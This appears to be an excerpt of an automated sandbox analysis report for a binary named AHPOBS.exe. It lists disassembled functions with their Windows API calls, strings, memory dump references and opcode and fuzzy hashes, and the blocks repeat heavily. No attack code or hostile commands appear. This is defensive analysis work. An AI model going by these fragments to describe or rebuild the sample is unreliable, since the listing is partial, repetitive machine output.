                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window_wcscat_wcslen
                                      • String ID: -----$SysListView32
                                      • API String ID: 4008455318-3975388722
                                      • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                      • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                      • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                      • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                      Function 00448123 Relevance: 15.2, APIs: 10, Instructions: 187windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                      • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                      • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                      • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                      • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                      • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: MessageSend$LongWindow
                                      • String ID:
                                      • API String ID: 312131281-0
                                      • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                      • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                      • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                      • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                      Function 00434621 Relevance: 15.1, APIs: 10, Instructions: 98threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentThreadId.KERNEL32 ref: 00434643
                                      • GetForegroundWindow.USER32(00000000), ref: 00434655
                                      • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                      • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                      • String ID:
                                      • API String ID: 2156557900-0
                                      • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                      • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                      • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                      • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                      Function 0046943F Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 287COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                      • API String ID: 0-1603158881
                                      • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                      • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                      • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                      • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                      Function 004485CB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateMenu.USER32 ref: 00448603
                                      • SetMenu.USER32(?,00000000), ref: 00448613
                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                      • IsMenu.USER32(?), ref: 004486AB
                                      • CreatePopupMenu.USER32 ref: 004486B5
                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                      • DrawMenuBar.USER32 ref: 004486F5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                      • String ID: 0
                                      • API String ID: 161812096-4108050209
                                      • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                      • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                      • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                      • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                      Function 00434034 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\AppData\Local\Temp\AHPOBS.exe), ref: 00434057
                                      • LoadStringW.USER32(00000000), ref: 00434060
                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                      • LoadStringW.USER32(00000000), ref: 00434078
                                      • _wprintf.LIBCMT ref: 004340A1
                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                      Strings
                                      • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                      • C:\Users\user\AppData\Local\Temp\AHPOBS.exe, xrefs: 00434040
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: HandleLoadModuleString$Message_wprintf
                                      • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\AppData\Local\Temp\AHPOBS.exe
                                      • API String ID: 3648134473-2340807463
                                      • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                      • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                      • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                      • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                      Function 0047679F Relevance: 13.8, APIs: 9, Instructions: 307COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3bc997797cbc56cb26591c8448e390fdf0d1bbe08c8f9b91b28c5433c1dd3e93
                                      • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                      • Opcode Fuzzy Hash: 3bc997797cbc56cb26591c8448e390fdf0d1bbe08c8f9b91b28c5433c1dd3e93
                                      • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                      Function 004561DA Relevance: 13.7, APIs: 9, Instructions: 164COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                      • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                      • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                      • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                      Function 00453893 Relevance: 13.7, APIs: 9, Instructions: 158filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Local\Temp\AHPOBS.exe,0040F545,C:\Users\user\AppData\Local\Temp\AHPOBS.exe,004A90E8,C:\Users\user\AppData\Local\Temp\AHPOBS.exe,?,0040F545), ref: 0041013C
                                        • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                      • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                      • MoveFileW.KERNEL32(?,?), ref: 00453932
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                      • String ID:
                                      • API String ID: 978794511-0
                                      • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                      • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                      • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                      • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                      Function 00441165 Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                      • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                      • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                      • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                      Function 00432704 Relevance: 13.5, APIs: 9, Instructions: 42COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ClearVariant
                                      • String ID:
                                      • API String ID: 1473721057-0
                                      • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                      • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                      • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                      • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                      Function 0044F0B3 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 389COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _memmove$_memcmp
                                      • String ID: '$\$h
                                      • API String ID: 2205784470-1303700344
                                      • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                      • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                      • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                      • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                      Function 0045EA0F Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 325timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                      • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                      • VariantClear.OLEAUT32 ref: 0045EA6D
                                      • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                      • __swprintf.LIBCMT ref: 0045EC33
                                      • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                      Strings
                                      • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                      • String ID: %4d%02d%02d%02d%02d%02d
                                      • API String ID: 2441338619-1568723262
                                      • Opcode ID: 8c0e9aff9de9f26e1e88bf39e061077f3b69c3f150aef51011e2da91f56c3119
                                      • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                      • Opcode Fuzzy Hash: 8c0e9aff9de9f26e1e88bf39e061077f3b69c3f150aef51011e2da91f56c3119
                                      • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                      Function 004091B0 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                      • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                      • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                      • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                      • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Interlocked$DecrementIncrement$Sleep
                                      • String ID: @COM_EVENTOBJ
                                      • API String ID: 327565842-2228938565
                                      • Opcode ID: 9fd16e4317a19ff9fc9810ea6acab1effe774116fa5380b772909f930cd41dda
                                      • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                      • Opcode Fuzzy Hash: 9fd16e4317a19ff9fc9810ea6acab1effe774116fa5380b772909f930cd41dda
                                      • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                      Function 0047025C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288COMMON
                                      Download Yara Rule
                                      APIs
                                      • VariantClear.OLEAUT32(?), ref: 0047031B
                                      • VariantClear.OLEAUT32(?), ref: 0047044F
                                      • VariantInit.OLEAUT32(?), ref: 004704A3
                                      • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                      • VariantClear.OLEAUT32(?), ref: 00470516
                                        • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                      • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                        • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                      • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
